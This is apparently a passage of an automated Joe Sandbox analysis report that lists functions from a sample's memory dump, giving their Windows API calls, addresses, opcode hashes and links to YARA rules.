                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                      • String ID:
                                                                      • API String ID: 1992179935-0
                                                                      • Opcode ID: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                                                                      • Instruction ID: 7445de534b29746397984d78874ca47e2df0853635a1563f4b2202651caffbb0
                                                                      • Opcode Fuzzy Hash: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                                                                      • Instruction Fuzzy Hash: 2381D072A01706ABE720AB29CC81B6AB3E9EF41364F2445BFF551D6381F770D9008B94
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C2BBDB Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00BA9CB3: _wcslen.LIBCMT ref: 00BA9CBD
                                                                        • Part of subcall function 00C2C998: CharUpperBuffW.USER32(?,?), ref: 00C2C9B5
                                                                        • Part of subcall function 00C2C998: _wcslen.LIBCMT ref: 00C2C9F1
                                                                        • Part of subcall function 00C2C998: _wcslen.LIBCMT ref: 00C2CA68
                                                                        • Part of subcall function 00C2C998: _wcslen.LIBCMT ref: 00C2CA9E
                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C2BCCA
                                                                      • RegOpenKeyExW.ADVAPI32 ref: 00C2BD25
                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00C2BD6A
                                                                      • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00C2BD99
                                                                      • RegCloseKey.ADVAPI32(?), ref: 00C2BDF3
                                                                      • RegCloseKey.ADVAPI32(?), ref: 00C2BDFF
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                      • String ID:
                                                                      • API String ID: 1120388591-0
                                                                      • Opcode ID: 1031c873cb5ab85e249b7890c22660cb3f537e1b6d506cbc8e7f37a852d73704
                                                                      • Instruction ID: c8247f49a803db49b862570ee154672b50de995124306f4018313872eb83f2e6
                                                                      • Opcode Fuzzy Hash: 1031c873cb5ab85e249b7890c22660cb3f537e1b6d506cbc8e7f37a852d73704
                                                                      • Instruction Fuzzy Hash: D081B030218241EFC714DF24D891E6ABBE5FF85308F14899CF5594B2A2DB31EE45CB92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BFF7AD Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • VariantInit.OLEAUT32(00000035), ref: 00BFF7B9
                                                                      • SysAllocString.OLEAUT32(00000001), ref: 00BFF860
                                                                      • VariantCopy.OLEAUT32(00BFFA64,00000000), ref: 00BFF889
                                                                      • VariantClear.OLEAUT32(00BFFA64), ref: 00BFF8AD
                                                                      • VariantCopy.OLEAUT32(00BFFA64,00000000), ref: 00BFF8B1
                                                                      • VariantClear.OLEAUT32(?), ref: 00BFF8BB
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$ClearCopy$AllocInitString
                                                                      • String ID:
                                                                      • API String ID: 3859894641-0
                                                                      • Opcode ID: cab41b4c7559480d3bed14ab77fdb0b227e2946ee0d183e49ba3321d46b76c10
                                                                      • Instruction ID: 6659c791250a91002e8579863b32eb7d8e9d51f60ae42231870b07fa912ca7ca
                                                                      • Opcode Fuzzy Hash: cab41b4c7559480d3bed14ab77fdb0b227e2946ee0d183e49ba3321d46b76c10
                                                                      • Instruction Fuzzy Hash: 6E51D43551031AFACF20AB65D8D5B39B3E4EF45310B2494E6EA05DF292DBB0CC44D796
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C1910C Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00BA7620: _wcslen.LIBCMT ref: 00BA7625
                                                                        • Part of subcall function 00BA6B57: _wcslen.LIBCMT ref: 00BA6B6A
                                                                      • GetOpenFileNameW.COMDLG32(00000058), ref: 00C194E5
                                                                      • _wcslen.LIBCMT ref: 00C19506
                                                                      • _wcslen.LIBCMT ref: 00C1952D
                                                                      • GetSaveFileNameW.COMDLG32(00000058), ref: 00C19585
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen$FileName$OpenSave
                                                                      • String ID: X
                                                                      • API String ID: 83654149-3081909835
                                                                      • Opcode ID: db552f8fb1a0a70d2f9bd48bb4fbe9a6acd054c351663437e5cfd20089f89b8b
                                                                      • Instruction ID: 041d51319bd8a594112c156c2dfa2bcf61ed9879cc68e0387f9945c7a7de9703
                                                                      • Opcode Fuzzy Hash: db552f8fb1a0a70d2f9bd48bb4fbe9a6acd054c351663437e5cfd20089f89b8b
                                                                      • Instruction Fuzzy Hash: B7E192715083108FD724DF24C891AAEB7E5FF86314F0485ADF8999B2A2DB31DE45CB92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BB920C Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00BB9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00BB9BB2
                                                                      • BeginPaint.USER32(?,?), ref: 00BB9241
                                                                      • GetWindowRect.USER32(?,?), ref: 00BB92A5
                                                                      • ScreenToClient.USER32(?,?), ref: 00BB92C2
                                                                      • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00BB92D3
                                                                      • EndPaint.USER32(?,?), ref: 00BB9321
                                                                      • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00BF71EA
                                                                        • Part of subcall function 00BB9339: BeginPath.GDI32(00000000), ref: 00BB9357
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                                      • String ID:
                                                                      • API String ID: 3050599898-0
                                                                      • Opcode ID: 3dab923683e9db404ac867b82830ee534135b04785636856848a996981f29fa7
                                                                      • Instruction ID: 131f70406b226c8caf4c6da042ac13987e2137b4c9b279bb18e3e1327b8553da
                                                                      • Opcode Fuzzy Hash: 3dab923683e9db404ac867b82830ee534135b04785636856848a996981f29fa7
                                                                      • Instruction Fuzzy Hash: 9D41AC71104200AFD721DF28DCC5FBA7BF8EF45720F1402A9FAA4972A2C7719949DB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C107EF Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • InterlockedExchange.KERNEL32(?,000001F5), ref: 00C1080C
                                                                      • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00C10847
                                                                      • EnterCriticalSection.KERNEL32(?), ref: 00C10863
                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 00C108DC
                                                                      • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 00C108F3
                                                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 00C10921
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                      • String ID:
                                                                      • API String ID: 3368777196-0
                                                                      • Opcode ID: 3b8ae24c088c88d083a4facdc9640307aa6f945221faa379c4b6f52025ea3d6d
                                                                      • Instruction ID: f47aeb29e9666f01802f52663055f456494e8b19b7dbe97470ce58846415d653
                                                                      • Opcode Fuzzy Hash: 3b8ae24c088c88d083a4facdc9640307aa6f945221faa379c4b6f52025ea3d6d
                                                                      • Instruction Fuzzy Hash: 75415971900205EBEF14AF64DC85BAE77B9FF05310F1440A9E900AA297D7B1DEA5DBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C381DB Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ShowWindow.USER32(FFFFFFFF,00000000), ref: 00C3824C
                                                                      • EnableWindow.USER32(00000000,00000000), ref: 00C38272
                                                                      • ShowWindow.USER32(FFFFFFFF,00000000), ref: 00C382D1
                                                                      • ShowWindow.USER32(00000000,00000004), ref: 00C382E5
                                                                      • EnableWindow.USER32(00000000,00000001), ref: 00C3830B
                                                                      • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00C3832F
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Show$Enable$MessageSend
                                                                      • String ID:
                                                                      • API String ID: 642888154-0
                                                                      • Opcode ID: 7d4b484fed8d06b5fa86b997dfa868e05670ab6a02be23357be72fc67dd27e36
                                                                      • Instruction ID: d7510663e788f0d3c88ae2393322e976ebb54aaae22ee91d713718eacd5de308
                                                                      • Opcode Fuzzy Hash: 7d4b484fed8d06b5fa86b997dfa868e05670ab6a02be23357be72fc67dd27e36
                                                                      • Instruction Fuzzy Hash: C7419474611744AFDF11CF15CC99BE97BE0BB0A714F184169FA185B272CB32A949CB50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C04C7D Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • IsWindowVisible.USER32(?), ref: 00C04C95
                                                                      • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00C04CB2
                                                                      • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00C04CEA
                                                                      • _wcslen.LIBCMT ref: 00C04D08
                                                                      • CharUpperBuffW.USER32(00000000,00000000), ref: 00C04D10
                                                                      • _wcsstr.LIBVCRUNTIME ref: 00C04D1A
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                                      • String ID:
                                                                      • API String ID: 72514467-0
                                                                      • Opcode ID: d174aa4de4c876be801bbe5bc609f5024eab4600fd4d6cb8d895263c0e1cea13
                                                                      • Instruction ID: a0631bfa4f559ae8fc48910af0254884d389c2f2401620b56c36be2908333c1d
                                                                      • Opcode Fuzzy Hash: d174aa4de4c876be801bbe5bc609f5024eab4600fd4d6cb8d895263c0e1cea13
                                                                      • Instruction Fuzzy Hash: 2B21D4B2204201BBEB195B39EC4AF7F7BECDF45750F108069FA05DA191EAA1DD00D7A0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C1581E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00BA3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00BA3A97,?,?,00BA2E7F,?,?,?,00000000), ref: 00BA3AC2
                                                                      • _wcslen.LIBCMT ref: 00C1587B
                                                                      • CoInitialize.OLE32(00000000), ref: 00C15995
                                                                      • CoCreateInstance.OLE32(00C3FCF8,00000000,00000001,00C3FB68,?), ref: 00C159AE
                                                                      • CoUninitialize.OLE32 ref: 00C159CC
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                                      • String ID: .lnk
                                                                      • API String ID: 3172280962-24824748
                                                                      • Opcode ID: 28f4de7b2379ad6078bea831b23b89c8a37288d12675701eb7c432c05fc2a40a
                                                                      • Instruction ID: d2197e7853357974e569828a895655b87ebe712260747402a2ea5909762bc18c
                                                                      • Opcode Fuzzy Hash: 28f4de7b2379ad6078bea831b23b89c8a37288d12675701eb7c432c05fc2a40a
                                                                      • Instruction Fuzzy Hash: 35D16570608701DFC714DF14C490A6ABBE1EF8A710F14889DF8999B361DB31ED86DB92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C0175D Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00C00FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00C00FCA
                                                                        • Part of subcall function 00C00FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00C00FD6
                                                                        • Part of subcall function 00C00FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00C00FE5
                                                                        • Part of subcall function 00C00FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00C00FEC
                                                                        • Part of subcall function 00C00FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00C01002
                                                                      • GetLengthSid.ADVAPI32(?,00000000,00C01335), ref: 00C017AE
                                                                      • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00C017BA
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 00C017C1
                                                                      • CopySid.ADVAPI32(00000000,00000000,?), ref: 00C017DA
                                                                      • GetProcessHeap.KERNEL32(00000000,00000000,00C01335), ref: 00C017EE
                                                                      • HeapFree.KERNEL32(00000000), ref: 00C017F5
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                      • String ID:
                                                                      • API String ID: 3008561057-0
                                                                      • Opcode ID: 42954c2818b84f0616da564492a4a7aada5c3d5b88e9f4e6cbdafb41913a9ca5
                                                                      • Instruction ID: a93a557f57de4dd6b0839eb7d7f8c66d7195852ab78f95919a01efac88b3f010
                                                                      • Opcode Fuzzy Hash: 42954c2818b84f0616da564492a4a7aada5c3d5b88e9f4e6cbdafb41913a9ca5
                                                                      • Instruction Fuzzy Hash: 7B119032510205FFDB149FA8CC89BAFBBF9EF45355F184018F891A7290D735AA44DB60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C014CE Relevance: 9.1, APIs: 6, Instructions: 64processCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00C014FF
                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00C01506
                                                                      • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00C01515
                                                                      • CloseHandle.KERNEL32(00000004), ref: 00C01520
                                                                      • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00C0154F
                                                                      • DestroyEnvironmentBlock.USERENV(00000000), ref: 00C01563
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                      • String ID:
                                                                      • API String ID: 1413079979-0
                                                                      • Opcode ID: bba8041bffcd65c8bbcf43746f96a9c252542708374ef415d49568f506fd822b
                                                                      • Instruction ID: 8bad31ddd1d92d91bb44650f1a39495cc2b77257e06c788cdf4280c19d8aa7c2
                                                                      • Opcode Fuzzy Hash: bba8041bffcd65c8bbcf43746f96a9c252542708374ef415d49568f506fd822b
                                                                      • Instruction Fuzzy Hash: 8C113A7250024DABDF118F98DD89FDE7BA9EF49744F088015FE15A20A0C375CE64DB60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BC3382 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetLastError.KERNEL32(?,?,00BC3379,00BC2FE5), ref: 00BC3390
                                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00BC339E
                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00BC33B7
                                                                      • SetLastError.KERNEL32(00000000,?,00BC3379,00BC2FE5), ref: 00BC3409
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLastValue___vcrt_
                                                                      • String ID:
                                                                      • API String ID: 3852720340-0
                                                                      • Opcode ID: f94e7553d33553a8fcaa44e9a29fce31cb34f7ccc36acb5d88dcfd2a929c58fc
                                                                      • Instruction ID: f37139f7362fff9c12dd1f342d77b845bd5848988b9e7ff862595998069232e0
                                                                      • Opcode Fuzzy Hash: f94e7553d33553a8fcaa44e9a29fce31cb34f7ccc36acb5d88dcfd2a929c58fc
                                                                      • Instruction Fuzzy Hash: 7B01243220C351BEAA2427B57CD5F6E2AD4EB45B793A082BEF410812F0EF554E015288
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BD2D74 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetLastError.KERNEL32(?,?,00BD5686,00BE3CD6,?,00000000,?,00BD5B6A,?,?,?,?,?,00BCE6D1,?,00C68A48), ref: 00BD2D78
                                                                      • _free.LIBCMT ref: 00BD2DAB
                                                                      • _free.LIBCMT ref: 00BD2DD3
                                                                      • SetLastError.KERNEL32(00000000,?,?,?,?,00BCE6D1,?,00C68A48,00000010,00BA4F4A,?,?,00000000,00BE3CD6), ref: 00BD2DE0
                                                                      • SetLastError.KERNEL32(00000000,?,?,?,?,00BCE6D1,?,00C68A48,00000010,00BA4F4A,?,?,00000000,00BE3CD6), ref: 00BD2DEC
                                                                      • _abort.LIBCMT ref: 00BD2DF2
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$_free$_abort
                                                                      • String ID:
                                                                      • API String ID: 3160817290-0
                                                                      • Opcode ID: f2e276e7dc032b926e8ffe68fdb3dbd38746d44c61e651967556a1199bd55e56
                                                                      • Instruction ID: 086772910e2ee64241cd9c17c2ec5280853442622d2269d95963f4c1869b6862
                                                                      • Opcode Fuzzy Hash: f2e276e7dc032b926e8ffe68fdb3dbd38746d44c61e651967556a1199bd55e56
